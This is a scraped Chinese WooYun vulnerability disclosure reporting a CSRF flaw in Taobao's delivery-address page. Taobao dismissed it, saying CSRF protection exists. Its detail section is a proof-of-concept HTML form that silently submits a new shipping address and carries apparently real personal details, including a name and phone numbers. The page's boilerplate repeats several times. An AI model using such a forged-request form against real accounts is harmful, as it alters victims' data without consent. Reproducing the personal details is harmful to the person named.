淘宝网CSRF添加收货地址 | wooyun-2015-0164471| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0164471

漏洞标题：淘宝网CSRF添加收货地址

漏洞作者：冰山

提交时间：2015-12-25 15:48

修复时间：2015-12-25 16:13

公开时间：2015-12-25 16:13

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-25：细节已通知厂商并且等待厂商处理中
2015-12-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

如题

详细说明：

1、

http://member1.taobao.com/member/fresh/deliver_address.htm

2、

3、

<html>
  <body>
    <form action="http://member1.taobao.com/member/fresh/deliver_address.htm" method="POST">
      <input type="hidden" name="action" value="DeliverAddressMgr" />
      <input type="hidden" name="event&#95;submit&#95;do&#95;save" value="anything" />
      <input type="hidden" name="from" value="mbis" />
      <input type="hidden" name="isFrame" value="false" />
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="lang" value="zh&#45;S" />
      <input type="hidden" name="&#95;tb&#95;token&#95;" value="OXM1aifkM5p" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="x" value="25&#46;03945" />
      <input type="hidden" name="y" value="102&#46;714729" />
      <input type="hidden" name="reurl" value="" />
      <input type="hidden" name="country" value="" />
      <input type="hidden" name="prov" value="530000" />
      <input type="hidden" name="provExt" value="" />
      <input type="hidden" name="city" value="530100" />
      <input type="hidden" name="area" value="530102" />
      <input type="hidden" name="town" value="530102002" />
      <input type="hidden" name="addressDetail" value="&#187;&#164;&#185;úÂ&#183;68ºÅ&#32;ÖÐ&#185;úÅ&#169;Òµ&#183;&#162;Õ&#185;ÒøÐÐÔÆÄÏÊ&#161;&#183;ÖÐÐ&#191;Í&#183;&#191;&#178;&#191;" />
      <input type="hidden" name="post" value="650001" />
      <input type="hidden" name="fullName" value="ÀîöÎ" />
      <input type="hidden" name="mobile&#95;area" value="1" />
      <input type="hidden" name="mobile" value="18206849493" />
      <input type="hidden" name="phone&#95;area" value="1" />
      <input type="hidden" name="phoneSection" value="0871" />
      <input type="hidden" name="phoneCode" value="3528991" />
      <input type="hidden" name="phoneExt" value="352799" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4、

5、

漏洞证明：

修复方案：

版权声明：转载请注明来源冰山@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-12-25 16:13

厂商回复：

您好，经审核此问题不存在，该处已有CSRF防护。感谢您对阿里巴巴安全的关注和支持。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0164471

漏洞标题：淘宝网CSRF添加收货地址

相关厂商：淘宝网

漏洞作者：冰山

提交时间：2015-12-25 15:48

修复时间：2015-12-25 16:13

公开时间：2015-12-25 16:13

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源冰山@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0164471

漏洞标题：淘宝网CSRF添加收货地址

相关厂商：淘宝网

漏洞作者： 冰山

提交时间：2015-12-25 15:48

修复时间：2015-12-25 16:13

公开时间：2015-12-25 16:13

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0164471"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 冰山@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：冰山

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源冰山@乌云